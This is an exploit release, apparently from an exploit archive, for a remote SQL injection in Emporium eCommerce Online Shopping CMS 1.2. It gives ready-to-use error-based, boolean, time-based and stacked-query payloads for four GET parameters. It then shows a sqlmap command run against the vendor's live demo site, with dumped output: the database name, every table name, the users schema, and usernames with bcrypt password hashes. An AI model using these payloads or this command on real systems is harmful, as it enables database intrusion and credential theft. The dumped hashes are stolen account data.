Headline
Emporium eCommerce Online Shopping CMS 1.2 SQL Injection
Emporium eCommerce Online Shopping CMS version 1.2 suffers from a remote SQL injection vulnerability.
┌┌────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Exploits ] ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr │ │ :│ Website : mybizcms.com │ │ ││ Vendor : mybizcms │ │ ││ Software : Emporium eCommerce - │ │ ││ Online Shopping CMS v 1.2 │ │ Emporium eCommerce ││ Vuln Type: Remote SQL Injection │ │ ││ Method : GET │ │ is a complete online ││ Critical : High [░░▒▒▓▓██] │ │ shopping platform for all your needs ││ Impact : Database Access │ │ ││ │ │ ││ ────────────────────────────────────────┘ └─────────────────────────────────────────││ B4nks-NET irc.b4nks.tk #unix ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ Typically used for remotely exploitable vulnerabilities that can lead to ││ system compromise. ││ │┌┌────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost CryptoJob (Twitter) twitter.com/CryptozJob┌┌────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2022 ┌┘└────────────────────────────────────────────────────────────────────────────────────┘┘There's 4 parameters Vulnerable to SQL Injection in /categories/other-categories?GET parameter 'min_price' is vulnerable---Parameter: min_price (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41---GET parameter 'percentage' is vulnerable.---Parameter: percentage (GET) Type: boolean-based blind Title: MySQL boolean-based blind - Parameter replace (MAKE_SET) Payload: percentage=MAKE_SET(4728=4728,5649) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)---GET parameter 'review_ratings' is vulnerable---Parameter: review_ratings (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)---GET parameter 'brand[]' is vulnerable---Parameter: brand[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: brand[]=15');SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc---Live Demo Site:https://mybizcms.com/demos/multivendor/[+] Starting the Attacksqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent[INFO] the back-end DBMS is MySQLweb application technology: Apache, PHP 7.3.33, PHPback-end DBMS: MySQL >= 5.0 (MariaDB fork)[INFO] fetching current databasecurrent database: 'mybizcms_multivendor'fetching tables for database: 'mybizcms_multivendor'[101 tables] +--------------------------+| returns || ad_placements || addresses || ads || attribute_items || attributes || authorize_net_settings || brands || categories || collections || company || counties || countries || credit_card_types || cronjobs || customers || deliveries || delivery_items || delivery_options || delivery_status || discounts || email_templates || facebook_settings || faqs || flash_sale_items || flash_sales || flutterwave_settings || github_settings || google_settings || item_status || labels || linkedin_settings || logs || media || mpesa_settings || newsletters || notifications || options || order_details || order_items || order_status || orders || pages || payment_options || payment_status || payments || payout_modes || payout_status || payouts || paypal_pro_settings || paypal_standard_settings || paytm_settings || payu_money_settings || permissions || pesapal_settings || pickup_stations || post_categories || post_comments || posts || product_attributes || product_images || product_reviews || product_stock || product_types || product_variants || product_wholesales || products || quicks || return_reasons || return_status || rewards || role_sub_permissions || roles || saved_items || sessions || shipping_fees || shipping_regions || shipping_weights || shops || sliders || stripe_settings || sub_permissions || subscribers || supported_currencies || tags || taxes || temp_data || ticket_priority || ticket_replies || ticket_status || tickets || timezones || twitter_settings || twocheckout_settings || user_status || user_sub_permissions || users || variant_choices || variant_options || wallets || weights |+--------------------------+ fetching columns for table 'users' in database 'mybizcms_multivendor' Table: users[34 columns] +------------------------+--------------+| Column | Type |+------------------------+--------------+| calling_code | varchar(11) || city | varchar(100) || company | varchar(100) || country_id | int(11) || date_added | datetime || default_billing | int(11) || default_currency | int(11) || default_language | varchar(40) || default_shipping | int(11) || department_id | int(11) || email | varchar(100) || firstname | varchar(50) || last_ip | varchar(40) || last_login | datetime || last_password_change | datetime || lastname | varchar(50) || latitude | varchar(300) || longitude | varchar(300) || new_pass_key_requested | datetime || passkey | varchar(32) || password | varchar(256) || payout_address | longtext || payout_mode_id | int(11) || phone | varchar(30) || postal_code | varchar(100) || profile_image | varchar(150) || role_id | int(11) || state | varchar(50) || street | varchar(100) || user_id | int(11) || user_status_id | int(11) || user_uid | varchar(50) || username | varchar(100) || zip_code | varchar(15) |+------------------------+--------------+ fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor' Database: mybizcms_multivendorTable: users[7 entries] +----------+--------------------------------------------------------------+------------------------+| username | password | email |+----------+--------------------------------------------------------------+------------------------+| admin | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | [email protected] || one | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | [email protected] || two | $2y$10$K27UTI0KPeP.N.6EzxED6eVgU6jcAJDq8vf.EuCxzGSEFdSyI/oeC | [email protected] || umuruviq | $2y$10$SID3yybe763.xosi8qwqkOTG8baLQQpIVdfrYzqG9dTPhcTtVL5Bu | [email protected] || three | $2y$10$iBnMAPE.3FDeivo2kYPhSerMS05TmbIZQ/bLD6FcmvCowStICaaw. | [email protected] || user | $2y$10$eZ0/eOZ5R.Mwju4nCqIgHuaVnBosugt8ADjwMCDzQP6oUUH2l5NVK | [email protected] || tbjjrhls | $2y$10$XKA6hBkZlCAU3T7KcQm.7ubs06COQH4mCcGHmBMwzyYp016oBYoPe | [email protected] |+----------+--------------------------------------------------------------+------------------------+[-] Done